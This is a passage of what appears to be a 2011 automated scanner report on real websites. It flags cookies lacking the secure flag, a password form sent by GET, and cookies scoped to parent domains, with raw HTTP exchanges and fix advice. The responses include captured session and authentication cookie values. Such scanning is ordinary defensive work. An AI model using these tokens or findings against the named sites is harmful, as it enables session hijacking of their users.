Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420159%3atrue%3afalse%3a0%3ac4wFYold1FoX5flDzeXNYHnayJw%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29758


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.20. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_W HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000Vhby-bpIpWQ2UcIyMe80vlp:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a9%0a20%2fejh7prtVltEMryh1brZCRsLLaPkaMe8Akhmqi39JY7u9vjrKp02H5AlUQE7E%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419835%3atrue%3afalse%3a0%3aCFEfewzTmdxWTKG7j05ZJskj1Zs%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29935


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

8.21. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Wired HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:49:36 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000kzU6rJKyKppPAMaRGuijmYh:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:58:17 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fDt%0aoJJmfmiKMqLpgwDfHCXGni13qTu0LfcLGqCDRlYqKtYD3XcqH1hYJGauy1R%2fYxU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420176%3atrue%3afalse%3a0%3a5KRoPYNZ6oweqAaKlufu18E0nIQ%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29856


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

9. Password field submitted using GET method

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

10. Cookie scoped to parent domain
There are 27 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.43things.com/person/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.43things.com
Path:   /person/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...

10.2. http://www.admob.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.admob.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...

10.3. http://www.walmart.com/x22

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.walmart.com
Path:   /x22

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Wed, 12 Jan 2011 15:26:32 GMT
Expires: Wed, 12 Jan 2011 15:26:32 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 15:26:33 GMT
Content-Length: 11881
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff090726f145525d5f4f58455e445a4a423660;path=/
Set-Cookie: dcenv=ndc; path=/; domain=walmart.com
Via: HTTP/1.1 nw307 (nw307_7330869248_73610240)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css"
...[SNIP]...

10.4. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.crwdcntrl.net
Path:   /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=ctst

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 62

CN.ad.lotame.tags={"Profile": {"Audiences": {"Audience":[]}}};

10.5. http://ad.doubleclick.net/activity

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=1699195;type=diamo995;cat=homep280;ord=1;num=1042927896831.613?&_dc_ck=try HTTP/1.1
Accept: */*
Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT
Date: Tue, 11 Jan 2011 13:27:09 GMT
Server: GFE/2.0
Expires: Tue, 11 Jan 2011 13:27:09 GMT

GIF89a.............!.......,...........L..;

10.6. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 844
Set-Cookie: id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 03:23:26 GMT
Expires: Wed, 12 Jan 2011 03:23:26 GMT
Connection: close

document.write('<!-- BEGIN DIMESTORE TAG -->\n');

var projectid = 2621;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B2347
...[SNIP]...

10.7. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;233079667;13533154;h?http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart
Set-Cookie: id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT
Date: Wed, 12 Jan 2011 03:24:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.8. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/wiredcom.dart/threatlevel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.intel.com/consumer/products/processors/corei5.htm?dfaid=1&crtvid=39900309
Set-Cookie: id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:23:22 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


10.9. http://ad.insightexpressai.com/adserver/adServer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.insightexpressai.com
Path:   /adserver/adServer.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/adServer.aspx?publisherID=338 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:04:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIControlCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBannerCounter170474=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:04:02 GMT
Connection: close
Content-Length: 9

//170474

10.10. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=2127270684&c7=http%3A%2F%2Fdownload.cnet.com%2F8301-2007_4-20027809-12.html%3Ftag%3Dmncol%3Btitle&c8=Android%20lands%20cloud%20security%20from%20Trend%20Micro%20%7C%&c9=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.11. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.pctools.com/spyware-doctor-antivirus/?ref=display-cnet&utm_source=download.com&utm_medium=banner&utm_content=all&utm_campaign=US_SECTARG_sdav_300_03_11-09
Server: Microsoft-IIS/7.5
Set-Cookie: E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:53 GMT
Connection: close


10.12. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-27742/Type-0/f4bbb00d-1a47-45b5-bf52-f968c23d96e3.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
